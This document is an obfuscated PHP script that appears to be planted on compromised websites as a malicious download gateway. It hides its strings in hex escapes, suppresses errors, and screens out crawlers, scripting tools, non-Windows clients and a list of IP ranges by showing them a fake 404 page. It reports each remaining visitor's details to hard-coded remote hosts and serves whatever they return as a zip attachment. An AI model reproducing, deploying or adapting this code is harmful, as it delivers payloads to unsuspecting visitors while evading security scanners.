<?php

${"GL\x4fB\x41L\x53"}["\x73\x74\x75\x75\x62\x64\x73\x66\x78\x78\x63"] = "\x69\x70";
${"\x47\x4cOB\x41\x4c\x53"}["o\x7ap\x61\x66\x6a\x69p\x74\x75"] = "\x74\x79\x70\x65";
${"\x47LO\x42\x41\x4c\x53"}["fi\x75\x77\x6e\x6ba\x6ck\x63\x76"] = "q\x75er\x79";
${"\x47\x4c\x4f\x42AL\x53"}["\x74z\x62\x7alq\x6ap\x67"] = "\x66ul\x6c_\x75rl";
${"\x47\x4c\x4f\x42\x41LS"}["\x73\x66k\x79\x67\x64\x70\x74y"] = "\x63\x6f\x6e\x74\x65nt";
${"\x47\x4cO\x42AL\x53"}["\x66\x75\x79\x62\x75\x79\x77vwr"] = "\x74ri\x65\x73_\x70er\x5f\x75\x72\x6c";
${"GL\x4f\x42AL\x53"}["ohk\x73\x64\x64f\x6e\x78"] = "i";
${"\x47\x4c\x4fB\x41LS"}["\x76\x63\x6f\x63\x6e\x71\x66\x6a\x66\x6c"] = "\x62a\x64\x5fip";
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x6c\x63\x76\x63p\x6e\x75"] = "t\x6f\x6b\x65\x6es\x5fp\x61r\x61\x6d";
${"\x47\x4cO\x42\x41\x4cS"}["\x64\x74plt\x74"] = "\x62\x61\x64_\x75as";

error_reporting(0);

${"\x47\x4c\x4f\x42A\x4c\x53"}["cd\x74\x66yl\x74\x70\x79"] = "t\x72ies_p\x65r\x5furl";

$tabqgph = "\x75\x72l\x73";

ini_set("\x64is\x70l\x61y\x5fer\x72o\x72\x73",0);

${"\x47\x4c\x4f\x42A\x4c\x53"}["t\x75\x62qf\x73\x62"] = "\x62\x61\x64\x5f\x69\x70\x73";
${${"\x47\x4c\x4fBA\x4c\x53"}["\x63\x64\x74fy\x6ct\x70\x79"]} = 1;

${$tabqgph} = array(
	"\x68\x74\x74p://\x37\x38\x2e\x31\x33\x38.\x3118.124/re\x71u\x65s\x741\x32\x2e\x70\x68\x70",
	"ht\x74p://b\x61h\x6esi\x6en-\x68at\x74\x65rs\x68eim.\x64\x65/med\x69\x61\x70\x6f\x6fl/8\x35/\x385\x39\x378\x33/re\x73o\x75\x72\x63\x65s/pi\x63\x74\x75re\x73/12\x368\x365\x2e\x70h\x70",
	"\x68tt\x70://\x37\x38.\x313\x38.118.\x31\x325/reque\x73\x7412.p\x68p"
);

${${"\x47LO\x42\x41\x4c\x53"}["\x64\x74\x70\x6c\x74t"]} 
	= array(
		"\x47o\x6fg\x6c\x65\x62\x6ft", "u\x72\x6clib", "W\x67\x65t",
		"M\x61\x63\x20\x4fS\x20\x58", "\x41\x6ed\x72\x6fi\x64", "L\x69\x6eux",
		"\x69\x50\x68on\x65", "iP\x61d", "b\x69\x6eg\x62o\x74",
		"B\x6c\x61ck\x42e\x72r\x79", "G\x6foglebot", "S\x61m\x20\x53\x70\x61de",
		"Maci\x6e\x74os\x68", "Ph\x6f\x6ee", "oBot", "Ap\x70Eng\x69ne",
		"m\x73\x6eb\x6ft", "H\x74t\x70\x20Brows\x65r",
		"c\x75\x72\x6c", "\x50y\x74hon", "\x70\x65rl", "\x47\x65\x74Ri\x67h\x74",
		"\x50ycURL", "A\x6eo\x6ey\x6do\x75\x73", "\x52u\x62\x79", "s\x70id\x65r",
		"\x4dSIE\x43\x72\x61\x77l\x65\x72", "G\x65\x6e\x69eo",
		"\x50l\x61\x79\x42\x6f\x6fk", "J\x61\x76a",
		"\x55R\x4cRed\x69\x72\x65\x63\x74", "MI\x44P",
		"\x4c\x53SRock\x65\x74Cr\x61wl\x65r", "\x5811", "Gn\x6f\x6de", "KD\x45",
	);

${${"\x47L\x4fB\x41\x4c\x53"}["\x74u\x62\x71\x66\x73\x62"]}
	= array(
		"\x31\x30.1\x2e79\x2e","\x31\x303.\x324\x36\x2e36.",
		"\x31\x31\x37\x2e2\x37.1\x341.","\x3117\x2e\x327.15\x31.",
		"\x31\x318\x2e14\x35\x2e2\x2e","\x31\x318.\x3145\x2e\x35\x2e",
		"\x31\x321\x2e54\x2e\x358.","12\x33.1\x39\x36\x2e\x311\x32\x2e",
		"1\x32\x35.77\x2e\x31\x394\x2e","1\x327\x2e0\x2e\x30.",
		"167\x2e18\x32\x2e1\x32\x34\x2e","167\x2e18\x32\x2e5\x37.",
		"1\x383.\x312\x2e\x3177.","\x31\x384\x2e\x31\x373\x2e2\x34\x31\x2e",
		"\x31\x38\x34\x2e1\x379.\x31\x322\x2e","1\x388.24\x34.35\x2e",
		"\x31\x392.\x31\x368.\x31.","\x31\x392\x2e1\x368\x2e2.",
		"\x3193\x2e\x31\x39\x30\x2e15\x34\x2e","19\x34.47.\x3174.",
		"\x31\x395.15\x39\x2e\x31\x34\x30.","\x31\x395.\x39\x33.1\x302\x2e",
		"\x31\x39\x35\x2e93.\x318\x2e","\x319\x35\x2e9\x33.\x321.",
		"\x3195.93.60.","1\x398\x2e2\x30\x38\x2e\x315\x39.",
		"1\x398.2\x30\x38.2\x35\x31\x2e","19\x39.\x347\x2e\x31\x368\x2e",
		"2\x301.\x3238\x2e\x32\x34\x36.","2\x30\x35\x2e1\x388\x2e116.","
		20\x35\x2e\x3188\x2e\x311\x37.","207.1\x35\x38\x2e\x341.",
		"20\x37\x2e200\x2e\x311\x32\x2e","\x3208.1\x32\x32.\x39\x35.",
		"208.50.1\x301.","\x320\x38.\x36\x34\x2e\x313\x38.",
		"20\x38.\x38\x30.\x319\x34\x2e","\x3209\x2e\x31\x391\x2e87.",
		"2\x310\x2e51.1\x387.","21\x37\x2e69.\x31\x332\x2e",
		"\x321\x31\x2e\x3152\x2e\x34\x32\x2e","2\x318.10\x37.20\x37.",
		"\x32\x31\x38.\x35\x2e\x378.","\x321\x38.\x38\x35.\x31\x337.",
		"218\x2e8\x35.\x31\x33\x38\x2e","2\x31\x39\x2e2\x33\x39\x2e\x39\x35.",
		"22\x30\x2e1\x381\x2e3\x31.","222.7\x36\x2e2\x31\x32.",
		"\x3222.7\x36.2\x315\x2e","\x32\x322.76.2\x31\x38.",
		"\x35\x2e9\x2e2\x30\x38.","5\x39\x2e60.7\x2e",
		"6\x34.1\x32\x2e\x31\x316.","\x364.1\x32.\x31\x31\x37.",
		"64.12\x34\x2e\x32\x303.","66\x2e\x3150.14.",
		"\x366\x2e\x32\x33\x30.\x31\x394.","66\x2e\x32\x33\x30.\x31\x39\x36.",
		"\x366\x2e2\x330.2\x32\x30.","\x37\x34.\x32\x31\x37.148\x2e",
		"74\x2e\x355.1\x38\x37.","\x75\x6e\x6bn\x6f\x77n",
		"95\x2e25\x2e\x3186.\x32\x32\x37","4\x36.\x31\x388.5\x2e190",
		"\x39\x34\x2e\x32\x39\x2e6\x2e1\x39\x33","\x31\x388\x2e\x32\x34\x34\x2e\x33\x38\x2e8\x36",
		"\x395\x2e\x32\x36\x2e9\x30\x2e168","95\x2e25.2\x31\x30.\x32\x33\x39",
		"9\x35.\x32\x36.\x390\x2e\x319\x33",
	);

PhpDisplay();

function IsClientBad($ip,$ua,$path) 
{
	$uxsclizhzw = "\x70\x61\x74\x68";
	${"\x47\x4cO\x42A\x4cS"}["\x78\x69b\x74q\x79\x62"] = "t\x6fk\x65n\x73_\x70\x61\x72a\x6d";
	$lnuvtmnm = "\x74\x6f\x6b\x65\x6e\x73\x5f\x70\x61ra\x6d";
	$bsefdhw = "\x74\x6f\x6b\x65ns\x5fp\x61\x72\x61\x6d";
	$eknopnn = "\x74\x6f\x6be\x6e\x73\x5fp\x61\x72\x61\x6d";
	global $bad_ips;
	global $bad_uas;
	$ekccdcohf = "\x62\x61d\x5f\x75\x61\x73";
	$rvpeikizcq = "\x75\x61";
	$lwwkffdh = "\x62\x61d\x5f\x69ps";

	${${"G\x4c\x4f\x42\x41L\x53"}["\x78\x6c\x63\x76\x63p\x6eu"]}
		= explode("?",${$uxsclizhzw});

	if (count(${$lnuvtmnm}) != 2) {
		return TRUE;
	}

	${$eknopnn} = explode("\x3d",${$bsefdhw}[1]);
	${"\x47\x4c\x4f\x42\x41\x4cS"}["e\x63\x6d\x61\x74\x78\x6a"] = "\x74o\x6b\x65\x6e\x73\x5f\x70\x61r\x61m";
	${"\x47\x4c\x4fBA\x4cS"}["\x68\x71j\x62\x63\x66v\x64\x70\x76b\x6f"] = "\x62\x61\x64_\x75a";
	$pfldpbelut = "\x62\x61\x64\x5f\x69\x70";

	if (count(${${"\x47\x4c\x4fBA\x4cS"}["\x78\x6c\x63\x76\x63pn\x75"]}) != 2) {
		return TRUE;
	}

	${${"\x47\x4c\x4fB\x41LS"}["x\x69\x62\x74q\x79b"]}
		= explode("_",${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x78\x6c\x63\x76\x63\x70n\x75"]}[1]);

	if (count(${${"\x47\x4c\x4f\x42AL\x53"}["\x65\x63\x6d\x61\x74\x78j"]}) != 2) {
		return TRUE;
	}

	if (strlen(${$rvpeikizcq})<20) {
		return TRUE;
	}

	foreach(${$lwwkffdh} as${$pfldpbelut}) {
		${"G\x4c\x4fB\x41\x4c\x53"}["aqpu\x73ctb\x62\x6c"] = "\x69\x70";
		if(strstr(
			${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["a\x71\x70\x75sc\x74\x62\x62l"]},
			${${"G\x4cOB\x41\x4c\x53"}["v\x63\x6f\x63\x6e\x71f\x6a\x66l"]}
		) !== FALSE) {
			return TRUE;
		}
	}

	foreach (${$ekccdcohf} as ${${"G\x4c\x4f\x42ALS"}["\x68\x71\x6a\x62\x63\x66\x76dp\x76\x62\x6f"]}) {
		${"\x47\x4cOB\x41\x4c\x53"}["yb\x6a\x62\x73h\x79\x76"] = "\x75a";
		$fcwbnsdghec = "\x62\x61\x64\x5f\x75\x61";

		if (strstr(
			${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x79b\x6a\x62\x73h\x79v"]},
			${$fcwbnsdghec})
		!== FALSE) {
			return TRUE;
		}
	}

	return FALSE;
}

function GetData($param)
{
	global $urls;
	global $tries_per_url;

	while (TRUE) {
		$wrrmbbl = "u\x72\x6c";
		${"\x47L\x4f\x42\x41L\x53"}["v\x6awq\x75z\x7a\x77\x6d\x6d"]
			= "u\x72\x6c\x73";

		foreach (${${"\x47L\x4f\x42\x41\x4c\x53"}["v\x6awquz\x7a\x77\x6dm"]} as ${$wrrmbbl}) {
			${"\x47\x4c\x4f\x42\x41\x4c\x53"}["m\x78l\x71ku\x67\x71\x76\x71\x74"]
				= "p\x61\x72a\x6d";
			${"\x47LO\x42\x41\x4c\x53"}["b\x61\x67\x6f\x6dqg\x73vd\x70"]
				= "ful\x6c\x5f\x75r\x6c";
			${"\x47\x4cO\x42\x41\x4c\x53"}["\x6bs\x6c\x71\x64zve"] = "u\x72l";
			${${"\x47\x4c\x4fBALS"}["\x62\x61g\x6f\x6d\x71g\x73vd\x70"]}
				= ${${"\x47\x4c\x4f\x42ALS"}["ks\x6cqd\x7av\x65"]}
					."?"
					.${${"\x47LOB\x41\x4cS"}["\x6d\x78\x6c\x71k\x75\x67\x71v\x71t"]};

			for (
				${${"\x47\x4cO\x42AL\x53"}["o\x68\x6b\x73d\x64\x66nx"]} = 0;
				${${"G\x4c\x4f\x42AL\x53"}["o\x68k\x73\x64\x64\x66n\x78"]} 
					< ${${"\x47L\x4fB\x41\x4c\x53"}["\x66\x75\x79\x62\x75\x79w\x76\x77\x72"]};
				${${"G\x4cOB\x41L\x53"}["\x6fh\x6b\x73dd\x66n\x78"]}++) {
					${${"\x47L\x4f\x42A\x4c\x53"}["\x73f\x6b\x79\x67\x64p\x74\x79"]}
						= file_get_contents(
							${${"GLO\x42\x41\x4cS"}["\x74\x7ab\x7a\x6c\x71\x6a\x70\x67"]}
						);
					$tpbbnmssxx = "\x63\x6f\x6e\x74\x65n\x74";
					if (!empty(${$tpbbnmssxx})) {
						${"GLOB\x41\x4c\x53"}["\x6cf\x75\x7a\x6e\x72\x6cr"]
							= "\x63\x6f\x6e\x74\x65\x6e\x74";
						return ${${"GL\x4fB\x41LS"}["l\x66\x75\x7a\x6e\x72\x6cr"]};
					}
			}
		}
	}

	return "";
}

function PhpDisplay($url)
{
	${"G\x4c\x4f\x42\x41LS"}["\x65\x69\x65\x6f\x6dj\x77\x63\x6d\x69"]
		= "\x71\x75\x65ry";
	$cktlmqo = "q\x75er\x79";
	${"G\x4cOB\x41\x4cS"}["\x79kwz\x79ck"] = "q\x75\x65\x72\x79";
	$zkhpqjw = "q\x75ery";
	$bifmridwwmj = "qu\x65\x72\x79";
	${${"G\x4c\x4fB\x41\x4cS"}["\x66\x69\x75\x77\x6e\x6ba\x6c\x6bc\x76"]}
		= array();

	${"\x47\x4cO\x42\x41\x4c\x53"}["w\x79lg\x70\x66\x75\x72"]
		= "\x71\x75\x65\x72\x79";

	${${"G\x4c\x4fB\x41\x4cS"}["\x66\x69\x75wn\x6balkc\x76"]}["\x69\x70"]
		= GetIp();

	${"\x47\x4c\x4f\x42\x41\x4cS"}["\x7a\x64\x6a\x70\x6c\x6b\x76\x64"]
		=  "\x71u\x65r\x79";

	$yungcsk = "\x63\x6f\x6e\x74\x65n\x74";
	$nxbrfkdu = "c\x6f\x6e\x74\x65\x6et";
	$cmklaywxa = "co\x6eten\x74";
	$kbmofomc = "\x63on\x74\x65\x6et";
	${"\x47L\x4f\x42A\x4cS"}["d\x67ut\x79d\x61e\x65"]
		= "q\x75\x65\x72\x79";
	${${"GL\x4f\x42A\x4cS"}["dg\x75\x74y\x64\x61\x65\x65"]}["ti\x6d\x65"]
		= date("d/M/Y:\x48:\x69:\x73",time());
	${$cktlmqo}["r\x65que\x73\x74"]
		= $_SERVER["\x52\x45\x51U\x45S\x54\x5f\x4d\x45\x54H\x4fD"];
	${$bifmridwwmj}["\x70\x61\x74\x68"]
		= $_SERVER["\x52\x45\x51U\x45\x53\x54\x5f\x55R\x49"];
	${${"\x47\x4c\x4f\x42A\x4c\x53"}["w\x79\x6c\x67p\x66u\x72"]}["p\x72\x6f\x74o\x63o\x6c"]
		= $_SERVER["\x53ER\x56E\x52_\x50RO\x54\x4f\x43\x4f\x4c"];
	$qvxwumwxo = "\x71ue\x72y";
	${"G\x4c\x4f\x42A\x4c\x53"}["\x77\x78x\x67b\x67\x6ays\x76m"]
		= "\x63on\x74en\x74";
	${${"G\x4cOB\x41LS"}["\x7a\x64jp\x6c\x6b\x76\x64"]}["u\x73\x65\x72a\x67\x65\x6et"]
		= $_SERVER["\x48TT\x50\x5fU\x53E\x52\x5fA\x47\x45NT"];
	${${"\x47\x4cOB\x41L\x53"}["\x79k\x77\x7a\x79\x63\x6b"]}["\x72eferer"]
		= isset($_SERVER["H\x54T\x50\x5f\x52\x45F\x45\x52ER"])?$_SERVER["\x48\x54\x54P\x5f\x52E\x46\x45RE\x52"]:"-";

	if (IsClientBad(${${"\x47\x4cOB\x41\x4c\x53"}["\x66iuwn\x6b\x61\x6ck\x63\x76"]}["i\x70"],${$qvxwumwxo}["\x75s\x65ra\x67ent"],${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x65\x69\x65\x6f\x6d\x6a\x77\x63mi"]}["\x70\x61\x74h"])) {
		Error404();
	}

	${$kbmofomc} = GetData(http_build_query(${$zkhpqjw}));
	$poxamzqdroq = "\x66ilen\x61\x6d\x65";
	$dyhmzd = "f\x69\x6ce\x6e\x61\x6de";
	$dbszpjw = "\x74\x79\x70\x65";
	${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x6bu\x77wg\x72"] = "\x63o\x6et\x65n\x74";

	if (empty(${$yungcsk}) OR stripos(${${"\x47LOB\x41\x4c\x53"}["s\x66\x6byg\x64\x70\x74y"]},"\x65\x72r\x6fr")
		!== FALSE) {
		Error404();
	}

	${$cmklaywxa} = explode("\n",${${"\x47\x4c\x4fB\x41\x4c\x53"}["wx\x78\x67\x62\x67\x6a\x79\x73v\x6d"]});
	${$poxamzqdroq} = array_shift(${$nxbrfkdu});

	${${"\x47\x4c\x4f\x42\x41L\x53"}["s\x66ky\x67\x64\x70t\x79"]} = implode("\n",${${"\x47\x4cO\x42\x41LS"}["\x6fkuw\x77\x67r"]});
	${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["oz\x70a\x66\x6a\x69p\x74u"]} = "\x61\x70plica\x74\x69\x6f\x6e/zi\x70";

	header("\x43o\x6etent-Ty\x70\x65:".${$dbszpjw});
	header("\x43\x6fn\x74\x65\x6e\x74-Dis\x70\x6fs\x69ti\x6fn:\x20\x61t\x74a\x63\x68\x6d\x65n\x74;\x66\x69len\x61me=".${$dyhmzd});
	header("\x43o\x6e\x74e\x6et-Leng\x74h: "
		.strlen(${${"GL\x4f\x42A\x4c\x53"}["\x73\x66\x6b\x79gd\x70\x74\x79"]})
	);

	echo ${${"\x47L\x4f\x42\x41L\x53"}["\x73fky\x67\x64p\x74\x79"]};

	exit();
}

function Error404() {
	header("H\x54TP/1.\x31\x20\x340\x34\x20\x4eot Fou\x6e\x64");
	exit("\x3c!DO\x43TYPE HTM\x4c \x50UB\x4cI\x43 \"-//\x49\x45T\x46//\x44\x54D\x20\x48TML \x32\x2e0//\x45N\x22>\r\n"."<h\x74\x6d\x6c>\x3ch\x65\x61d>\x3cti\x74\x6c\x65\x3e4\x30\x34\x20\x4e\x6ft \x46\x6f\x75n\x64\x3c/t\x69\x74le>\x3c/\x68\x65\x61d>\x3c\x62\x6f\x64\x79\x3e\r\n"."\x3ch\x31>N\x6f\x74\x20\x46o\x75nd\x3c/h1\x3e\r\n"."\x3c\x70>\x54he\x20r\x65q\x75es\x74\x65\x64\x20\x55R\x4c \x77a\x73 not\x20f\x6f\x75\x6ed o\x6e \x74\x68is se\x72\x76\x65r\x2e\x3c/p>\r\n"."<\x68r>\r\n"."</b\x6f\x64\x79\x3e</\x68\x74ml>\r\n");
}

function GetIp()
{
	${"GLO\x42A\x4c\x53"}["\x6bewcb\x74kj\x70\x70v"] = "i\x70";
	${"\x47L\x4f\x42\x41L\x53"}["z\x72\x62\x6f\x6bd\x65\x74"] = "\x69p";
	${"G\x4c\x4fB\x41LS"}["\x73m\x6e\x6b\x6b\x77\x6b\x62r\x66pr"] = "\x69\x70";
	${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6be\x77c\x62\x74\x6b\x6a\x70\x70\x76"]} = NULL;

	if(isset($_SERVER["\x48\x54\x54\x50\x5f\x58_\x46\x4f\x52\x57A\x52D\x45D\x5fF\x4fR"])) {
		$edriyopcuml = "\x69\x70";
		${$edriyopcuml}
			= $_SERVER["HT\x54P_X_\x46OR\x57\x41\x52DE\x44_\x46O\x52"];

	} elseif (isset($_SERVER["H\x54T\x50\x5f\x43\x4c\x49\x45\x4eT_I\x50"])) {
		${"\x47L\x4f\x42A\x4c\x53"}["v\x6a\x71\x79\x6cj\x73"]="ip";
		${${"G\x4c\x4fB\x41L\x53"}["\x76\x6a\x71yljs"]}
			= $_SERVER["\x48TTP\x5f\x43\x4c\x49\x45\x4e\x54_IP"];

	} elseif (isset($_SERVER["\x52EMO\x54E_ADDR"])) {

		${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6eyr\x67m\x65\x6f\x62x"]="\x69\x70";
		${${"G\x4c\x4f\x42\x41\x4c\x53"}["n\x79\x72\x67m\x65\x6f\x62\x78"]}
			= $_SERVER["REMOT\x45_AD\x44R"];

	}

	if (strpos(
		${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x7a\x72\x62ok\x64\x65\x74"]},
			","
		) !== FALSE) {

		$chpcrlioytj = "\x69\x70";
		$fqqcdynlnp = "ips";
		${"\x47L\x4f\x42\x41\x4c\x53"}["\x6c\x63d\x69g\x67t"] = "\x69\x70s";

		${$fqqcdynlnp} = explode(",",${$chpcrlioytj});

		${${"GLO\x42\x41\x4c\x53"}["\x73\x74\x75\x75\x62\x64sfxxc"]}
			= trim(array_pop(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6cc\x64\x69\x67g\x74"]}));

	}

	return${${"\x47LO\x42A\x4c\x53"}["sm\x6ekk\x77k\x62\x72\x66p\x72"]};
}
?>
